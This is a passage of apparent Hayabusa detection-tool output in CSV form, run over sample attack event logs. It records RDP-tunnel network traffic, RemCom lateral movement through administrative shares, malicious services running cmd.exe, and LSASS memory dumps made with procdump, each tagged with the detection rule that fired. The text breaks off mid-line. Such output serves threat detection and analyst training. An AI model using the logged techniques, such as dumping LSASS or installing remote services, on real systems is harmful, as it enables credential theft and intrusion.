365ABB72-E015-5C67-0000-00103FC01500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:26.529 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\winlogon.exe | PID: 2988 | PGUID: 365ABB72-E014-5C67-0000-001094B81500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\csrss.exe | PID: 3204 | PGUID: 365ABB72-E014-5C67-0000-001090B71500,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:26.539 +09:00,PC01.example.corp,5,info,,Process Terminated,Process: C:\Windows\System32\AtBroker.exe | PID: 1908 | PGUID: 365ABB72-E066-5C67-0000-00107A001600,../hayabusa-rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:63309 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:51695 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:62259 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:34.871 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49185 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:59302 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:62053 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:61049 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49186 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:46.929 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:1900 () | Dst: 10.0.2.16:52122 () | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:55679 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 224.0.0.252:5355 () | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 10.0.2.17:5355 (PC01.example.corp) | Dst: 10.0.2.18:52894 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:1:3:5355 () | Dst: fe80:0:0:0:647b:25b7:1cc4:b972:64257 (PC02) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1276 | PGUID: 365ABB72-D693-5C67-0000-0010C4180100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:05:59.056 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:139 (PC01.example.corp) | Dst: 10.0.2.18:49187 (PC02) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 239.255.255.250:3702 () | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: fe80:0:0:0:80ac:4126:fa58:1b81:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:00.558 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: ff02:0:0:0:0:0:0:c:3702 () | Dst: 0:0:0:0:0:0:0:1:61402 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:02.311 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 10.0.2.17:49188 (PC01.example.corp) | Dst: 10.0.2.18:5357 (PC02) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:02.561 +09:00,PC01.example.corp,3,info,,Network Connection,udp | Src: 127.0.0.1:3702 (PC01.example.corp) | Dst: 127.0.0.1:61401 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 1608 | PGUID: 365ABB72-D695-5C67-0000-00103C3E0100,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:49189 (PC01.example.corp) | Dst: 127.0.0.1:5357 (PC01.example.corp) | User: NT AUTHORITY\LOCAL SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 952 | PGUID: 365ABB72-D692-5C67-0000-0010FCC10000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:03.062 +09:00,PC01.example.corp,3,info,,Network Connection,tcp | Src: 127.0.0.1:5357 (PC01.example.corp) | Dst: 127.0.0.1:49189 (PC01.example.corp) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-5517-5C68-0000-0010EA030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3820 | PGUID: 365ABB72-E0AE-5C67-0000-0010C9B81700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx 2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x95c2e,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x311293,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: System32\RemComSvc.exe | IP Addr: 10.0.2.16 | LID: 0x7accb8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32 | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-02-17 03:19:18.522 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: IEUser | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\System32\RemComSvc.exe | IP Addr: ::1 | LID: 0x27df8,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx 2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolfool | Path: cmd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:20:28.621 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: spoolfool | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Suspicious Service Installed,Svc: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,high,Persis,Malicious Service Possibly Installed,Svc: spoolsv | Path: cmd.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-03 18:24:24.699 +09:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: spoolsv | Path: cmd.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\Desktop\lsass.exe_190317_120941.dmp | Process: C:\Users\IEUser\Desktop\procdump.exe | PID: 1856 | PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:09:41.328 +09:00,PC04.example.corp,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\procdump.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1856 | Src PGUID: 365ABB72-9B75-5C8E-0000-0010013F1200 | Tgt PID: 476 | Tgt PGUID: 365ABB72-0886-5C8F-0000-001030560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\lsass (2).DMP | Process: C:\Windows\system32\taskmgr.exe | PID: 3576 | PGUID: 365ABB72-9B85-5C8E-0000-0010C4CC1200,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Memory Dump File Creation,,../hayabusa-rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_lsass_memdump.evtx 2019-03-18 04:10:03.991 +09:00,PC04.example.corp,11,high,CredAccess,LSASS Process Memory Dump Files,,../hayabusa-rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 